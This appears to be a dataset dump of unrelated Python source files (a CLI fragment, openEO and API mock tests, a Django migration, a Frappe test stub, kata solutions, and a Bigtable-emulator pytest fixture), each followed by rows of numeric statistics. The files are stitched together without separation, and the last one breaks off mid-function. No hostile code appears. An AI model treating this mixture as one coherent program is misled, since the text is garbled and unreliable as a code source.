elif type_command == "cluster":
knot_lib.parsing_data_cluster(message, broker, flags=flag)
else:
print("Type Command Not Found")
except KeyboardInterrupt:
print("Exited")
# except Exception as e:
# env_lib.utils.log_err(str(e))
exit()
| 38.987805
| 82
| 0.483891
| 320
| 3,197
| 4.65625
| 0.21875
| 0.056376
| 0.05906
| 0.075168
| 0.777181
| 0.747651
| 0.747651
| 0.747651
| 0.747651
| 0.747651
| 0
| 0
| 0.432906
| 3,197
| 82
| 83
| 38.987805
| 0.821842
| 0.079137
| 0
| 0.78125
| 0
| 0
| 0.099618
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015625
| false
| 0
| 0.078125
| 0
| 0.109375
| 0.09375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
af9cba96e04a6dafd8fe9ffe1a97e239f33fd7e2
| 188
|
py
|
Python
|
improutils/__init__.py
|
ImprolabFIT/improutils
|
84666f88db594dd5d24cf946c635df37643ed309
|
[
"MIT"
] | null | null | null |
improutils/__init__.py
|
ImprolabFIT/improutils
|
84666f88db594dd5d24cf946c635df37643ed309
|
[
"MIT"
] | null | null | null |
improutils/__init__.py
|
ImprolabFIT/improutils
|
84666f88db594dd5d24cf946c635df37643ed309
|
[
"MIT"
] | null | null | null |
from .other import *
from .acquisition import *
from .filtration import *
from .preprocessing import *
from .recognition import *
from .segmentation import *
from .visualisation import *
| 20.888889
| 28
| 0.771277
| 21
| 188
| 6.904762
| 0.428571
| 0.413793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.154255
| 188
| 8
| 29
| 23.5
| 0.91195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
afcfa7df8b6551e0c9178682429e9831edd629a5
| 1,767
|
py
|
Python
|
tests/test_write_basic_udf.py
|
eodcgmbh/eodc-openeo-bindings
|
4e80eba036771a0c81359e1ac66862f1eead407b
|
[
"MIT"
] | null | null | null |
tests/test_write_basic_udf.py
|
eodcgmbh/eodc-openeo-bindings
|
4e80eba036771a0c81359e1ac66862f1eead407b
|
[
"MIT"
] | 7
|
2020-02-18T17:12:31.000Z
|
2020-09-24T07:19:04.000Z
|
tests/test_write_basic_udf.py
|
eodcgmbh/eodc-openeo-bindings
|
4e80eba036771a0c81359e1ac66862f1eead407b
|
[
"MIT"
] | null | null | null |
"""
This test checks the input file generation of a basic job using a python UDF.
"""
import os
from eodc_openeo_bindings.job_writer.basic_writer import BasicJobWriter
def test_basic_python_udf(test_folder, out_filepath_basic, backend_processes, S2_filepaths_short):
evi_file = os.path.join(test_folder, 'process_graphs', 'udf_python.json')
BasicJobWriter().write_job(process_graph_json=evi_file, job_data='./output_udf_python',
process_defs=backend_processes, in_filepaths=S2_filepaths_short, output_filepath=out_filepath_basic)
with open(out_filepath_basic) as outfile:
out_content = outfile.read()
filepath_split = os.path.splitext(out_filepath_basic)[0]
filename = filepath_split.split(os.path.sep)[-1]
ref_filepath = os.path.join(os.environ['REF_JOBS'], filename + '_udf_python_ref.py')
with open(ref_filepath) as outfile:
ref_content = outfile.read()
assert out_content == ref_content
def test_basic_r_udf(test_folder, out_filepath_basic, backend_processes, S2_filepaths_short):
evi_file = os.path.join(test_folder, 'process_graphs', 'udf_r.json')
BasicJobWriter().write_job(process_graph_json=evi_file, job_data='./output_udf_r',
process_defs=backend_processes, in_filepaths=S2_filepaths_short, output_filepath=out_filepath_basic)
with open(out_filepath_basic) as outfile:
out_content = outfile.read()
filepath_split = os.path.splitext(out_filepath_basic)[0]
filename = filepath_split.split(os.path.sep)[-1]
ref_filepath = os.path.join(os.environ['REF_JOBS'], filename + '_udf_r_ref.py')
with open(ref_filepath) as outfile:
ref_content = outfile.read()
assert out_content == ref_content
| 39.266667
| 131
| 0.739106
| 249
| 1,767
| 4.875502
| 0.24498
| 0.072488
| 0.105437
| 0.026359
| 0.848435
| 0.848435
| 0.848435
| 0.848435
| 0.848435
| 0.848435
| 0
| 0.005402
| 0.161856
| 1,767
| 44
| 132
| 40.159091
| 0.814315
| 0.043577
| 0
| 0.615385
| 0
| 0
| 0.079073
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.076923
| false
| 0
| 0.076923
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
bbb7c8daf68cfc0db3531104ebe1585494d2cd41
| 192
|
py
|
Python
|
jude_customization/jude_customization/doctype/atlantic_fluid_configuration/test_atlantic_fluid_configuration.py
|
mymi14s/jude_customization
|
6de7173a03cedf8c712c2d05453c821dff7eec58
|
[
"MIT"
] | null | null | null |
jude_customization/jude_customization/doctype/atlantic_fluid_configuration/test_atlantic_fluid_configuration.py
|
mymi14s/jude_customization
|
6de7173a03cedf8c712c2d05453c821dff7eec58
|
[
"MIT"
] | null | null | null |
jude_customization/jude_customization/doctype/atlantic_fluid_configuration/test_atlantic_fluid_configuration.py
|
mymi14s/jude_customization
|
6de7173a03cedf8c712c2d05453c821dff7eec58
|
[
"MIT"
] | 2
|
2020-11-09T16:22:52.000Z
|
2020-12-19T20:52:10.000Z
|
# Copyright (c) 2021, Anthony Emmanuel, github.com/mymi14ss and Contributors
# See license.txt
# import frappe
import unittest
class TestAtlanticFluidConfiguration(unittest.TestCase):
pass
| 21.333333
| 76
| 0.807292
| 22
| 192
| 7.045455
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035503
| 0.119792
| 192
| 8
| 77
| 24
| 0.881657
| 0.541667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
bbbf9065c2092f796276d52d4458d16e60c9b5cb
| 97
|
py
|
Python
|
tadataka/__init__.py
|
IshitaTakeshi/DVO
|
2c5a3db1db7e651bfaa7808bbf79a6c1c6a42fc5
|
[
"Apache-2.0"
] | 7
|
2019-12-20T07:19:11.000Z
|
2021-07-22T03:25:12.000Z
|
tadataka/__init__.py
|
IshitaTakeshi/DVO
|
2c5a3db1db7e651bfaa7808bbf79a6c1c6a42fc5
|
[
"Apache-2.0"
] | null | null | null |
tadataka/__init__.py
|
IshitaTakeshi/DVO
|
2c5a3db1db7e651bfaa7808bbf79a6c1c6a42fc5
|
[
"Apache-2.0"
] | null | null | null |
from tadataka.visual_odometry import VisualOdometry
from tadataka.camera import CameraParameters
| 32.333333
| 51
| 0.896907
| 11
| 97
| 7.818182
| 0.727273
| 0.27907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082474
| 97
| 2
| 52
| 48.5
| 0.966292
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bbed6bb7a92a7f22be0a1cdd4bf174a34f7f4719
| 7,655
|
py
|
Python
|
tests/Monkeypatching/test_Api_monkeypatching_api_get_by_id.py
|
LudwikaMalinowska/Automated-Testing-Project2
|
f0868700af8d6b946768d67b3c1768c2447f1a60
|
[
"MIT"
] | null | null | null |
tests/Monkeypatching/test_Api_monkeypatching_api_get_by_id.py
|
LudwikaMalinowska/Automated-Testing-Project2
|
f0868700af8d6b946768d67b3c1768c2447f1a60
|
[
"MIT"
] | null | null | null |
tests/Monkeypatching/test_Api_monkeypatching_api_get_by_id.py
|
LudwikaMalinowska/Automated-Testing-Project2
|
f0868700af8d6b946768d67b3c1768c2447f1a60
|
[
"MIT"
] | null | null | null |
import unittest
import requests
from assertpy import assert_that
from requests.exceptions import Timeout
from unittest.mock import Mock, patch
from src.Api import Api
from src.todos import todos
class TestApiMonkeyPatch(unittest.TestCase):
@patch('src.Api.Api', autospec=True)
def test_method_api_get_by_id_raises_timeout(self, mock_class):
mock_id = Mock()
mock_id.return_value = 1
mock_class.api_get_by_id.side_effect = Timeout
with self.assertRaises(Timeout):
mock_class.api_get_by_id(mock_id)
def test_method_api_get_by_id_assert_that_called_once(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_get_by_id(mock_id)
mock_api.api_get_by_id.assert_called_once()
def test_method_api_get_by_id_assert_that_called(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_get_by_id(mock_id)
mock_api.api_get_by_id(mock_id2)
mock_api.api_get_by_id.assert_called()
def test_method_api_get_by_id_assert_that_not_called(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_get_by_id.assert_not_called()
def test_method_api_get_by_id_assert_that_called_with_id_1(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_get_by_id(mock_id)
mock_api.api_get_by_id.assert_called_with(mock_id)
def test_method_api_get_by_id_assert_that_called_once_with_id_1(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_get_by_id(mock_id)
mock_api.api_get_by_id.assert_called_once_with(mock_id)
def test_method_api_get_by_id_assert_that_response_equal_to_expected_userId_1_id_1_completed_false(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_get_by_id.return_value = {"data": todos[todo_id - 1], "status_code": 200}
response = mock_api.api_get_by_id(todo_id)
expected_todo = {
"userId": 1,
"id": 1,
"title": "delectus aut autem",
"completed": False
}
assert_that(response["data"]).is_equal_to(expected_todo)
def test_method_api_get_by_id_assert_that_response_contains_all_keys_userId_id_title_completed(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_get_by_id.return_value = {"data": todos[todo_id - 1], "status_code": 200}
response = mock_api.api_get_by_id(todo_id)
assert_that(response["data"]).contains_key("userId", "id", "title", "completed")
def test_method_api_get_by_id_assert_that_response_has_status_code_200(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_get_by_id.return_value = {"data": todos[todo_id - 1], "status_code": 200}
response = mock_api.api_get_by_id(todo_id)
assert_that(response).has_status_code(200)
def test_method_api_get_by_id_assert_that_response_dont_have_status_code_200(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_get_by_id.return_value = {"status_code": 408}
response = mock_api.api_get_by_id(todo_id)
assert_that(response["status_code"]).is_not_equal_to(200)
def test_method_api_get_by_id_assert_that_not_called_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_get_by_id(mock_id)
with self.assertRaises(AssertionError):
mock_api.api_get_by_id.assert_not_called()
def test_method_api_get_by_id_assert_that_called_once_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_get_by_id(mock_id)
mock_api.api_get_by_id(mock_id2)
with self.assertRaises(AssertionError):
mock_api.api_get_by_id.assert_called_once()
def test_method_api_get_by_id_assert_that_called_with_id_1_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_get_by_id(mock_id2)
with self.assertRaises(AssertionError):
mock_api.api_get_by_id.assert_called_with(mock_id)
def test_api_get_by_id_monkeypatch_called_once_with_id_1_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_get_by_id(mock_id)
mock_api.api_get_by_id(mock_id2)
with self.assertRaises(AssertionError):
mock_api.api_get_by_id.assert_called_once_with(mock_id)
def test_method_api_get_by_id_no_parameter_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
with self.assertRaises(TypeError):
mock_api.api_get_by_id()
def test_method_api_get_by_id_assert_that_response_returns_ValueError_when_called_with_id_0_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 0
mock_api.api_get_by_id.return_value = {"status_code": 408}
mock_api.api_get_by_id.side_effect = ValueError
assert_that(mock_api.api_get_by_id).raises(ValueError).when_called_with(todo_id)
def test_method_api_get_by_id_assert_that_response_returns_ValueError_when_called_with_id_300_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 300
mock_api.api_get_by_id.return_value = {"status_code": 408}
mock_api.api_get_by_id.side_effect = ValueError
assert_that(mock_api.api_get_by_id).raises(ValueError).when_called_with(todo_id)
def test_method_api_get_by_id_assert_that_response_returns_TypeError_when_called_with_id_not_int_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = "1"
mock_api.api_get_by_id.return_value = {"status_code": 408}
mock_api.api_get_by_id.side_effect = TypeError
assert_that(mock_api.api_get_by_id).raises(TypeError).when_called_with(todo_id)
def test_method_api_get_by_id_assert_that_response_returns_AttributeError_when_called_with_id_None_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = None
mock_api.api_get_by_id.return_value = {"status_code": 408}
mock_api.api_get_by_id.side_effect = AttributeError
assert_that(mock_api.api_get_by_id).raises(AttributeError).when_called_with(todo_id)
if __name__ == '__main__':
unittest.main()
| 44.248555
| 119
| 0.678903
| 1,157
| 7,655
| 3.996543
| 0.070873
| 0.08045
| 0.107266
| 0.134083
| 0.847318
| 0.839533
| 0.821151
| 0.816176
| 0.807742
| 0.786548
| 0
| 0.014734
| 0.237492
| 7,655
| 173
| 120
| 44.248555
| 0.777454
| 0
| 0
| 0.622378
| 0
| 0
| 0.052116
| 0
| 0
| 0
| 0
| 0
| 0.27972
| 1
| 0.132867
| false
| 0
| 0.048951
| 0
| 0.188811
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
bbf5f66b6a4f40cea15c174917bd79930606ce25
| 189
|
py
|
Python
|
tests/controls/scroller.py
|
whitegreyblack/PyWin
|
78f3637b4c03c11d7f6ef15b20a1acf699d4be24
|
[
"MIT"
] | null | null | null |
tests/controls/scroller.py
|
whitegreyblack/PyWin
|
78f3637b4c03c11d7f6ef15b20a1acf699d4be24
|
[
"MIT"
] | null | null | null |
tests/controls/scroller.py
|
whitegreyblack/PyWin
|
78f3637b4c03c11d7f6ef15b20a1acf699d4be24
|
[
"MIT"
] | null | null | null |
"""ScrollList Component Test"""
import curses
from source.controls import Window
from source.controls import ScrollList as Scroller
__author__ = "Samuel Whang"
def view(screen):
pass
| 18.9
| 50
| 0.777778
| 24
| 189
| 5.958333
| 0.75
| 0.13986
| 0.251748
| 0.335664
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 189
| 9
| 51
| 21
| 0.888199
| 0.132275
| 0
| 0
| 0
| 0
| 0.075949
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0.166667
| 0.5
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 6
|
a5724709634797eaf22a9f27d89e8c87596f3423
| 115
|
py
|
Python
|
recvCases/conf.py
|
BattleJudge/recvCase
|
b7e55cd3c40603fe2c0086066421b269a0664f1e
|
[
"MIT"
] | null | null | null |
recvCases/conf.py
|
BattleJudge/recvCase
|
b7e55cd3c40603fe2c0086066421b269a0664f1e
|
[
"MIT"
] | null | null | null |
recvCases/conf.py
|
BattleJudge/recvCase
|
b7e55cd3c40603fe2c0086066421b269a0664f1e
|
[
"MIT"
] | null | null | null |
ErrorMsg = {'BadZipFile' : 'Uploaded zip file is bad',
'EmptyZipFile' : 'Uploaded zip file is empty',}
| 57.5
| 59
| 0.626087
| 13
| 115
| 5.538462
| 0.692308
| 0.305556
| 0.416667
| 0.472222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.243478
| 115
| 2
| 59
| 57.5
| 0.827586
| 0
| 0
| 0
| 0
| 0
| 0.62069
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a57be98b089324586aa986fd832a393072298d21
| 2,412
|
py
|
Python
|
leads/migrations/0009_alter_bankstatement_bank_statement_and_more.py
|
sumeet2605/CRM
|
1c9a740ef052d0e51b2689dd3e1666ff4673db98
|
[
"MIT"
] | null | null | null |
leads/migrations/0009_alter_bankstatement_bank_statement_and_more.py
|
sumeet2605/CRM
|
1c9a740ef052d0e51b2689dd3e1666ff4673db98
|
[
"MIT"
] | null | null | null |
leads/migrations/0009_alter_bankstatement_bank_statement_and_more.py
|
sumeet2605/CRM
|
1c9a740ef052d0e51b2689dd3e1666ff4673db98
|
[
"MIT"
] | null | null | null |
# Generated by Django 4.0 on 2022-02-06 09:46
from django.db import migrations, models
import leads.models
import rizcrm.storage_backends
class Migration(migrations.Migration):
dependencies = [
('leads', '0008_user_profile_picture'),
]
operations = [
migrations.AlterField(
model_name='bankstatement',
name='bank_statement',
field=models.FileField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to=leads.models.handle_upload_kyc),
),
migrations.AlterField(
model_name='c2cdocument',
name='card_copy',
field=models.ImageField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to=leads.models.handle_upload_kyc),
),
migrations.AlterField(
model_name='c2cdocument',
name='card_statement',
field=models.FileField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to=leads.models.handle_upload_kyc),
),
migrations.AlterField(
model_name='document',
name='company_id',
field=models.ImageField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to=leads.models.handle_upload_documents),
),
migrations.AlterField(
model_name='document',
name='pan_card',
field=models.FileField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to=leads.models.handle_upload_documents),
),
migrations.AlterField(
model_name='document',
name='photo',
field=models.ImageField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to=leads.models.handle_upload_documents),
),
migrations.AlterField(
model_name='salaryslip',
name='salary_slip',
field=models.FileField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to=leads.models.handle_upload_kyc),
),
migrations.AlterField(
model_name='user',
name='profile_picture',
field=models.ImageField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to='profile_pictures/'),
),
]
| 43.071429
| 161
| 0.665837
| 247
| 2,412
| 6.299595
| 0.234818
| 0.075193
| 0.121465
| 0.1491
| 0.78856
| 0.78856
| 0.780848
| 0.780848
| 0.780848
| 0.780848
| 0
| 0.010672
| 0.223051
| 2,412
| 55
| 162
| 43.854545
| 0.819637
| 0.017828
| 0
| 0.530612
| 1
| 0
| 0.08703
| 0.010562
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.061224
| 0
| 0.122449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3c325c2ee5bdb7ac85221911bcf0265edefa9de5
| 91
|
py
|
Python
|
8_kyu/Removing_Elements.py
|
UlrichBerntien/Codewars-Katas
|
bbd025e67aa352d313564d3862db19fffa39f552
|
[
"MIT"
] | null | null | null |
8_kyu/Removing_Elements.py
|
UlrichBerntien/Codewars-Katas
|
bbd025e67aa352d313564d3862db19fffa39f552
|
[
"MIT"
] | null | null | null |
8_kyu/Removing_Elements.py
|
UlrichBerntien/Codewars-Katas
|
bbd025e67aa352d313564d3862db19fffa39f552
|
[
"MIT"
] | null | null | null |
def remove_every_other(my_list):
return [my_list[it] for it in range(0,len(my_list),2)]
| 45.5
| 58
| 0.736264
| 19
| 91
| 3.263158
| 0.736842
| 0.290323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025
| 0.120879
| 91
| 2
| 58
| 45.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
3c48c2125ebec3cfbc2f8abe3432087a8f247884
| 28
|
py
|
Python
|
ars/__init__.py
|
david-lindner/ARS
|
acfe403ebe90c157d61690a9498597244853fc78
|
[
"BSD-2-Clause"
] | null | null | null |
ars/__init__.py
|
david-lindner/ARS
|
acfe403ebe90c157d61690a9498597244853fc78
|
[
"BSD-2-Clause"
] | null | null | null |
ars/__init__.py
|
david-lindner/ARS
|
acfe403ebe90c157d61690a9498597244853fc78
|
[
"BSD-2-Clause"
] | null | null | null |
from .ars import ARSLearner
| 14
| 27
| 0.821429
| 4
| 28
| 5.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3c90a121b4d915c2524981fd84ae09376497b28d
| 91
|
py
|
Python
|
chocopy-rs/test/pa3/simple_str.py
|
wwylele/chocopy-wwylele
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | 5
|
2020-05-13T03:47:43.000Z
|
2022-01-20T04:52:42.000Z
|
chocopy-rs/test/pa3/simple_str.py
|
wwylele/chocopy-wwylele
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | 4
|
2020-05-18T01:06:15.000Z
|
2020-06-12T19:33:14.000Z
|
chocopy-rs/test/pa3/simple_str.py
|
wwylele/chocopy-rs
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | null | null | null |
print("debug_print: 42")
print("")
print("Hello")
#!
#<->#
#debug_print: 42
#
#Hello
#<->#
| 9.1
| 24
| 0.56044
| 11
| 91
| 4.454545
| 0.363636
| 0.408163
| 0.489796
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05
| 0.120879
| 91
| 9
| 25
| 10.111111
| 0.5625
| 0.296703
| 0
| 0
| 0
| 0
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
59373033d6759f87ac888baaf5e7fad69fe7d8fc
| 135,252
|
py
|
Python
|
pychunkedgraph/tests/test.py
|
perlman/PyChunkedGraph
|
2c582f46a8292010e8f9f54c94c63af0b172bdad
|
[
"MIT"
] | null | null | null |
pychunkedgraph/tests/test.py
|
perlman/PyChunkedGraph
|
2c582f46a8292010e8f9f54c94c63af0b172bdad
|
[
"MIT"
] | null | null | null |
pychunkedgraph/tests/test.py
|
perlman/PyChunkedGraph
|
2c582f46a8292010e8f9f54c94c63af0b172bdad
|
[
"MIT"
] | null | null | null |
import sys
import os
import subprocess
import pytest
import numpy as np
from functools import partial
import collections
from grpc._channel import _Rendezvous
from google.cloud import bigtable
from google.auth import credentials
from math import inf
from datetime import datetime, timedelta
from time import sleep
from signal import SIGTERM
from warnings import warn
sys.path.insert(0, os.path.join(sys.path[0], '..'))
from pychunkedgraph.backend import chunkedgraph # noqa
from pychunkedgraph.backend.utils import serializers, column_keys # noqa
from pychunkedgraph.backend import chunkedgraph_exceptions as cg_exceptions # noqa
from pychunkedgraph.creator import graph_tests # noqa
def setup_emulator_env():
bt_env_init = subprocess.run(
["gcloud", "beta", "emulators", "bigtable", "env-init"], stdout=subprocess.PIPE)
os.environ["BIGTABLE_EMULATOR_HOST"] = \
bt_env_init.stdout.decode("utf-8").strip().split('=')[-1]
c = bigtable.Client(
project='IGNORE_ENVIRONMENT_PROJECT',
credentials=credentials.AnonymousCredentials(),
admin=True)
t = c.instance("emulated_instance").table("emulated_table")
try:
t.create()
return True
except Exception as err:
print('Bigtable Emulator not yet ready: %s' % err)
return False
@pytest.fixture(scope='session', autouse=True)
def bigtable_emulator(request):
# Start Emulator
bigtable_emulator = subprocess.Popen(
["gcloud", "beta", "emulators", "bigtable", "start"], preexec_fn=os.setsid,
stdout=subprocess.PIPE)
# Wait for Emulator to start up
print("Waiting for BigTables Emulator to start up...", end='')
retries = 5
while retries > 0:
if setup_emulator_env() is True:
break
else:
retries -= 1
sleep(5)
if retries == 0:
print("\nCouldn't start Bigtable Emulator. Make sure it is installed correctly.")
exit(1)
# Setup Emulator-Finalizer
def fin():
os.killpg(os.getpgid(bigtable_emulator.pid), SIGTERM)
bigtable_emulator.wait()
request.addfinalizer(fin)
@pytest.fixture(scope='function')
def lock_expired_timedelta_override(request):
# HACK: For the duration of the test, set global LOCK_EXPIRED_TIME_DELTA
# to 1 second (otherwise test would have to run for several minutes)
original_timedelta = chunkedgraph.LOCK_EXPIRED_TIME_DELTA
chunkedgraph.LOCK_EXPIRED_TIME_DELTA = timedelta(seconds=1)
# Ensure that we restore the original value, even if the test fails.
def fin():
chunkedgraph.LOCK_EXPIRED_TIME_DELTA = original_timedelta
request.addfinalizer(fin)
return chunkedgraph.LOCK_EXPIRED_TIME_DELTA
@pytest.fixture(scope='function')
def gen_graph(request):
def _cgraph(request, fan_out=2, n_layers=10):
# setup Chunked Graph
dataset_info = {
"data_dir": ""
}
graph = chunkedgraph.ChunkedGraph(
request.function.__name__,
project_id='IGNORE_ENVIRONMENT_PROJECT',
credentials=credentials.AnonymousCredentials(),
instance_id="emulated_instance", dataset_info=dataset_info,
chunk_size=np.array([512, 512, 64], dtype=np.uint64),
is_new=True, fan_out=np.uint64(fan_out),
n_layers=np.uint64(n_layers))
# setup Chunked Graph - Finalizer
def fin():
graph.table.delete()
request.addfinalizer(fin)
return graph
return partial(_cgraph, request)
@pytest.fixture(scope='function')
def gen_graph_simplequerytest(request, gen_graph):
"""
┌─────┬─────┬─────┐
│ A¹ │ B¹ │ C¹ │
│ 1 │ 3━2━┿━━4 │
│ │ │ │
└─────┴─────┴─────┘
"""
graph = gen_graph(n_layers=4)
# Chunk A
create_chunk(graph,
vertices=[to_label(graph, 1, 0, 0, 0, 0)],
edges=[])
# Chunk B
